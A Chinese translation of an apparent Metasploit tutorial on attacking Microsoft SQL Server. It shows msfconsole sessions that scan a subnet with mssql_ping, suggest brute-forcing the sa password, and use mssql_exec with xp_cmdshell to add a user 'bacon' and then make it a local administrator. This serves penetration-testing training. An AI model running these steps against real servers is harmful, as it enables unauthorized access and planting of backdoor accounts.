seo优化_前端开发_渗透技术使用UDP足迹可以在内部网络中搜索和定位MSSQL安装。安装MSSQL时,它将安装在TCP端口1433或随机动态TCP端口上。如果端口是动态属性,则查询UDP端口1434将为我们提供有关服务器的信息,包括服务正在侦听的TCP端口。
让我们在msfconsole中搜索并加载MSSQL ping模块。
msf > search mssql Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator auxiliary/admin/mssql/mssql_enum_domain_accounts normal Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_sql_logins normal Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration auxiliary/admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner auxiliary/admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner auxiliary/admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS auxiliary/admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution auxiliary/admin/mssql/mssql_findandsampledata normal Microsoft SQL Server Find and Sample Data auxiliary/admin/mssql/mssql_idf normal Microsoft SQL Server Interesting Data Finder auxiliary/admin/mssql/mssql_ntlm_stealer normal Microsoft SQL Server NTLM Stealer auxiliary/admin/mssql/mssql_ntlm_stealer_sqli normal Microsoft SQL Server SQLi NTLM Stealer auxiliary/admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query auxiliary/admin/mssql/mssql_sql_file normal Microsoft SQL Server Generic Query from File auxiliary/analyze/jtr_mssql_fast normal John the Ripper MS SQL Password Cracker (Fast Mode) auxiliary/gather/lansweeper_collector normal Lansweeper Credential Collector auxiliary/scanner/mssql/mssql_hashdump normal MSSQL Password Hashdump auxiliary/scanner/mssql/mssql_login normal MSSQL Login Utility auxiliary/scanner/mssql/mssql_ping normal MSSQL Ping Utility auxiliary/scanner/mssql/mssql_schemadump normal MSSQL Schema Dump auxiliary/server/capture/mssql normal Authentication Capture: MSSQL exploit/windows/iis/msadc 1998-07-17 excellent MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution exploit/windows/mssql/lyris_listmanager_weak_pass 2005-12-08 excellent Lyris ListManager MSDE Weak sa Password exploit/windows/mssql/ms02_039_slammer 2002-07-24 good MS02-039 Microsoft SQL Server Resolution Overflow exploit/windows/mssql/ms02_056_hello 2002-08-05 good MS02-056 Microsoft SQL Server Hello Overflow exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Microsoft SQL Server Clr Stored Procedure Payload Execution exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution exploit/windows/mssql/mssql_payload 2000-05-30 excellent Microsoft SQL Server Payload Execution exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection post/windows/gather/credentials/mssql_local_hashdump normal Windows Gather Local SQL Server Hash Dump post/windows/manage/mssql_local_auth_bypass normal Windows Manage Local Microsoft SQL Server Authorization Bypass msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" THREADS 1 yes The number of concurrent threads USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24 RHOSTS => 10.211.55.1/24 msf auxiliary(mssql_ping) > exploit [*] SQL Server information for 10.211.55.128: [*] tcp = 1433 [*] np = SSHACKTHISBOX-0pipesqlquery [*] Version = 8.00.194 [*] InstanceName = MSSQLSERVER [*] IsClustered = No [*] ServerName = SSHACKTHISBOX-0 [*] Auxiliary module execution completed
我们发出的第一个命令是搜索任何mssql插件。第二组说明是使用scanner / mssql / mssql_ping,这将为我们加载扫描仪模块。
接下来,显示选项使我们能够查看需要指定的内容。该组的.rhosts 10.211.55.1/24,开始寻找关于SQL服务器的子网范围。您可以指定/ 16或任何您想使用的内容。建议增加线程数,因为使用单线程扫描程序可能会花费很长时间。
发出运行命令后,将执行扫描并拉回有关MSSQL服务器的特定信息。如我们所见,该计算机的名称为“ SSHACKTHISBOX-0”,并且TCP端口在1433上运行。
此时,您可以使用scanner / mssql / mssql_login模块通过向模块传递字典文件来强行使用密码。或者,您也可以使用medusa或THC-Hydra来完成此操作。成功猜出密码后,就会有一个精巧的小模块来执行xp_cmdshell存储过程。
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > show options Module options (auxiliary/admin/mssql/mssql_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port (TCP) TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf auxiliary(mssql_exec) > set RHOST 10.211.55.128 RHOST => 10.211.55.128 msf auxiliary(mssql_exec) > set MSSQL_PASS password MSSQL_PASS => password msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD cmd => net user bacon ihazpassword /ADD msf auxiliary(mssql_exec) > exploit The command completed successfully. [*] Auxiliary module execution completed
查看“ net user bacon ihazpassword / ADD”的输出,我们已经成功添加了一个名为“ bacon”的用户帐户,从那里我们可以发出net localgroup管理员bacon / ADD来获得系统本身的本地管理员。此时,我们已经完全控制了系统。
